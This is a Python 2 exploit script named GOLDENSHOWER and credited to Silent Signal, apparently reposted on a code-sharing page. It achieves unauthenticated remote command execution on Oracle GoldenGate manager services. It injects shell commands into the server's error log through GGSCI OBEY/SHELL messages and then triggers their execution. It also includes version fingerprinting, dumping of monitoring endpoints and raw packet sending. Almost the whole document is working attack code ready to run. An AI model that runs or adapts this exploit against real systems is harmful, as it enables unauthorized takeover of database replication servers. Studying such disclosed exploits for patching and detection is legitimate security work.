扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 |
#!/usr/bin/env python # Sources: # https://silentsignal.hu/docs/S2_Oracle_GoldenGate_GOLDENSHOWER.py # https://blog.silentsignal.eu/2017/05/08/fools-of-golden-gate/ # # GOLDENSHOWER - Oracle GoldenGate unauthenticated RCE by Silent Signal # # Tested with: # Version 12.1.2.0.0 17185003 OGGCORE_12.1.2.0.0_PLATFORMS_130924.1316 Linux, x64, 64bit (optimized) Oracle 11g # Version 12.1.2.0.0 17185003 OGGCORE_12.1.2.0.0T1_PLATFORMS_140313.1216 Windows x64 (optimized) Oracle 12c # # Nmap service fingerprint example: # ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)======== # SF-Port7809-TCP:V=7.12%I=7%D=2/20%Time=DEADBEEF%P=x86_64-unknown-linux-gnu # SF:%r(RPCCheck,2D,"\0\+\x20\x20ERROR\tMGR\x20did\x20not\x20recognize\x20th # SF:e\x20command\.\0")%r(DNSVersionBindReq,28,"\0&\x20\x20ERROR\tMGR\x20Did # SF:\x20Not\x20Recognize\x20Command\0")%r(DNSStatusRequest,28,"\0&\x20\x20E # SF:RROR\tMGR\x20Did\x20Not\x20Recognize\x20Command\0")%r(afp,28,"\0&\x20\x # SF:20ERROR\tMGR\x20Did\x20Not\x20Recognize\x20Command\0")%r(kumo-server,2D # SF:,"\0\+\x20\x20ERROR\tMGR\x20did\x20not\x20recognize\x20the\x20command\. # SF:\0"); import socket import struct import argparse HOST = None PORT = None PLATFORM = None def send_write(cmd): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((HOST, PORT)) term_ch = "#" if PLATFORM == "win": term_ch = "&" cmd_ggsci = "GGSCI START OBEY x\nSHELL,%s %s " % (cmd, term_ch) cmd_ggsci = cmd_ggsci.replace(" ", "\x09") length = struct.pack(">H", len(cmd_ggsci)) s.send(length + cmd_ggsci) r = s.recv(1024) print "[+] '%s' WRITTEN \nReceived: %s\n" % (cmd, repr(r)) s.close() def send_exec(): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((HOST, PORT)) cmd = "GGSCI START OBEY ggserr.log".replace(" ", "\x09") length = struct.pack(">H", len(cmd)) s.send(length + cmd) r = s.recv(1024) print "[+] EXECUTED - Received: %s\n" % (repr(r)) s.close() def monitor(): if PLATFORM == "win": print "[!] Windows platform detected, this may not work!" import requests paths = ["messages", "registry", "statuschanges", "mpoints"] for p in paths: r = requests.get("http://%s:%d/%s" % (HOST, PORT, p)) print "\n--- MONITOR - %s ---" % (p) print r.text def version(): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((HOST, PORT)) #cmd = "GGSCI VERSION".replace(" ","\x09") cmd = "GGSCI\tVERSION" length = struct.pack(">H", len(cmd)) s.send(length + cmd) r = s.recv(1024) ver = r[5:].replace("\t", " ") print "[+] VERSION: %s\n" % (ver) s.close() return ver def debug(cmd, l=None): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((HOST, PORT)) length = None if l is None: length = struct.pack(">H", len(cmd)) else: length = struct.pack(">H", l) s.send(length + cmd) print "[+] Sent: %s" % (repr(length + cmd)) r = s.recv(1024) print "[+] Received: %s\n" % (repr(r)) s.close() parser = argparse.ArgumentParser( description='GOLDENSHOWER - Oracle GoldenGate unauthenticated RCE by Silent Signal') parser.add_argument("--host", help="Target host") parser.add_argument("--port", help="Target port", type=int, default=7809) parser.add_argument("--cmd", help="Command(s) to execute", nargs='*') parser.add_argument( "--monitor", help="Dump information (incl. version) via HTTP monitoring functions", action="store_true") parser.add_argument("--debugcmd", help="Send raw content", required=False) parser.add_argument("--debuglen", help="Indicated size of raw content", type=int, default=None, required=False) args = parser.parse_args() HOST = args.host PORT = args.port ver = version() if "Windows" in ver: PLATFORM = "win" print "[+] Platform: Windows" else: PLATFORM = "nix" print "[+] Platform: *nix" if args.cmd: for c in args.cmd: send_write(c) send_exec() if args.monitor: monitor() if args.debugcmd: debug(args.debugcmd, args.debuglen) # Signature: aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj0wNHZINFdfOVJmZw== |
体验盒子
